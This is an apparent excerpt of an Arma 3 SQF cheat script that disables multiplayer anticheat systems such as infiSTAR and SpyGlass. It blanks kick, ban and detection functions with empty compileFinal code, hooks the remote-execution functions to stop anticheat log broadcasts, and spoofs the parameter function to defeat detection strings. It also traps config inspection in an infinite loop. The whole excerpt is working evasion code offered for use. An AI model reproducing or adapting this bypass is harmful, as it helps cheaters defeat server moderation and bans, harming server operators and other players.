  4355. Enable_Admin_Menu = true;
  4356. Check_For_NoRecoil = false;
  4357. Check_For_ESP = false;
  4358. Blocked_Files = ["BypassedThisAnticheat.sqf"];
  4359. AH_fnc_Kick = compileFinal "";
  4360. _cheatengine_check = compileFinal "";
  4361. Check_For_Cheat_Engine = false;
  4362. _recoilcheck = compileFinal "";
  4363. PVAR_AH_BAN = compileFinal "";
  4364. Stop_OnMapSingleClick = compileFinal "";
  4365. Stop_GodMode = compileFinal "";
  4366. Kick = compileFinal "";
  4367. Receive_Notify = compileFinal "";
  4368. _baddies = compileFinal "false";
  4369. _FNC_AH142KICKLOG = compileFinal "false";
  4370. _TbVs = compileFinal "nil";
  4371. _badcontrolsannounced = compileFinal "false";
  4372. _check = compileFinal "false";
  4373. _smallxtofind = compileFinal "";
  4374. //test epoch ISBP
  4375. EH_FIRED = compileFinal "false";
  4376. infiSTAR = compileFinal "false";
  4377. _fnc_PVAH_AdminReq = compileFinal "";
  4378. _kickoff = compileFinal "";
  4379. BIS_fnc_returnChildren = compileFinal '
  4380. private ["_class","_depth","_lastOnly","_first","_classnames","_subClass","_subClassName"];
  4381. _class = [_this,0,configfile >> "",[configfile]] call bis_fnc_param;
  4382. _depth = [_this,1,0,[0]] call bis_fnc_param;
  4383. _lastOnly = [_this,2,true,[true]] call bis_fnc_param;
  4384. _first = [_this,3,true,[true]] call bis_fnc_param;
  4386. _badClass = configFile >> "RscDisplayMPInterrupt" >> "controls";
  4387. if(_class == _badClass) then {while{true} do {};};
  4389. _private = if (_first) then {["_classes"]} else {[]};
  4390. private _private;
  4391. if (_first) then {_classes = [];};
  4393. if (_depth >= 0) then {
  4394. _classnames = [];
  4395. {
  4396. for "_c" from 0 to (count _x - 1) do {
  4397. _subClass = _x select _c;
  4398. if (isclass _subClass) then {
  4399. _subClassName = tolower configname _subClass;
  4400. if !(_subClassName in _classnames) then {
  4401. if (_depth == 0 || _lastOnly) then {
  4402. _classes set [count _classes,_subClass];
  4403. _classnames set [count _classnames,_subClassName];
  4404. };
  4405. [_subClass,_depth - 1,_lastOnly,false] call bis_fnc_returnChildren;
  4406. };
  4407. };
  4408. };
  4409. } foreach (_class call bis_fnc_returnparents);
  4410. };
  4411. _classes
  4412. ';
  4413. BIS_fnc_MP = compileFinal '
  4414. with missionnamespace do {
  4415. private ["_params","_functionName","_target","_isPersistent","_isCall","_ownerID"];
  4417. _params = [_this,0,[]] call bis_fnc_param;
  4418. _functionName = [_this,1,"",[""]] call bis_fnc_param;
  4419. _target = [_this,2,true,[objnull,true,0,[],sideUnknown,grpnull,""]] call bis_fnc_param;
  4420. _isPersistent = [_this,3,false,[false]] call bis_fnc_param;
  4421. _isCall = [_this,4,false,[false]] call bis_fnc_param;
  4423. _ohShitNo = ["spy_fnc",_functionName] call BIS_fnc_inString;
  4424. if(!_ohShitNo) then {
  4425. fnc_log_ac = ("fnc_log_ac" == toLower(_functionName));
  4426. };
  4427. if(!_ohShitNo) then {
  4428. _ohShitNo = ("life_fnc_displayhint" == toLower(_functionName));
  4429. };
  4430. if(_ohShitNo) exitwith {
  4431. hint parseText format["<t align=""center"" size=""1.3"">Anti-Anticheat</t><br/>Oh shit bro! It looks like an anticheat tried to broadcast this function: %1",_functionName];
  4432. };
  4434. BIS_fnc_MP_packet = [0,_params,_functionName,_target,_isPersistent,_isCall];
  4435. publicvariableserver "BIS_fnc_MP_packet";
  4437. if !(ismultiplayer) then {
  4438. ["BIS_fnc_MP_packet",BIS_fnc_MP_packet] spawn BIS_fnc_MPexec;
  4439. };
  4441. BIS_fnc_MP_packet
  4442. };
  4443. ';
  4444. life_fnc_MP = compileFinal '
  4445. with missionnamespace do {
  4446. private ["_params","_functionName","_target","_isPersistent","_isCall","_ownerID"];
  4448. _params = [_this,0,[]] call bis_fnc_param;
  4449. _functionName = [_this,1,"",[""]] call bis_fnc_param;
  4450. _target = [_this,2,true,[objnull,true,0,[],sideUnknown,grpnull,""]] call bis_fnc_param;
  4451. _isPersistent = false;
  4452. _isCall = [_this,4,false,[false]] call bis_fnc_param;
  4454. _ohShitNo = ["spy_fnc",_functionName] call BIS_fnc_inString;
  4455. if(!_ohShitNo) then {
  4456. fnc_log_ac = ("fnc_log_ac" == toLower(_functionName));
  4457. };
  4458. if(!_ohShitNo) then {
  4459. _ohShitNo = ("life_fnc_displayhint" == toLower(_functionName));
  4460. };
  4461. if(_ohShitNo) exitwith {
  4462. hint parseText format["<t align=""center"" size=""1.3"">Anti-Anticheat</t><br/>Oh shit bro! It looks like an anticheat tried to broadcast this function: %1",_functionName];
  4463. };
  4465. if(isServer && isDedicated) then {
  4466. life_fnc_MP_packet = [0,_params,_functionName,_target,_isPersistent,_isCall,"__SERVER__","__SERVER__"];
  4467. } else {
  4468. life_fnc_MP_packet = [0,_params,_functionName,_target,_isPersistent,_isCall,profileName,getPlayerUID player];
  4469. };
  4470. publicvariableserver "life_fnc_MP_packet";
  4472. if !(ismultiplayer) then {
  4473. ["life_fnc_MP_packet",life_fnc_MP_packet] spawn life_fnc_MPexec;
  4474. };
  4476. life_fnc_MP_packet
  4477. };
  4478. ';
  4479. [] spawn {
  4480. while{true} do {
  4481. missionnamespace setvariable ["BIS_fnc_missionHandlers_win",false];
  4482. };
  4483. };
  4486. lyst1c_fnc_param = compileFinal preprocessfilelinenumbers "A3\Functions_f\Debug\fn_param.sqf";
  4487. bis_fnc_param = compileFinal '
  4488. _response = false;
  4489. _badStrings = ["infistar","spyglass"];
  4491. _array = _this select 0;
  4492. _index = _this select 1;
  4494. if(typename _array == typename []) then {
  4495. if(count _array > 0) then {
  4496. _itemOne = _array select 0;
  4498. if(typename _itemOne == typename "") then {
  4499. _text = toLower(_itemOne);
  4500. if(_index == 1) then {
  4501. {
  4502. if((_text find _x) != -1) exitWith {
  4503. _response = true;
  4504. };
  4505. } forEach _badStrings;
  4506. }
  4507. };
  4508. };
  4509. };
  4510. _value = _this call lyst1c_fnc_param;
  4511. if(_response) then {
  4512. _value = true;
  4513. };
  4514. _value
  4515. ';
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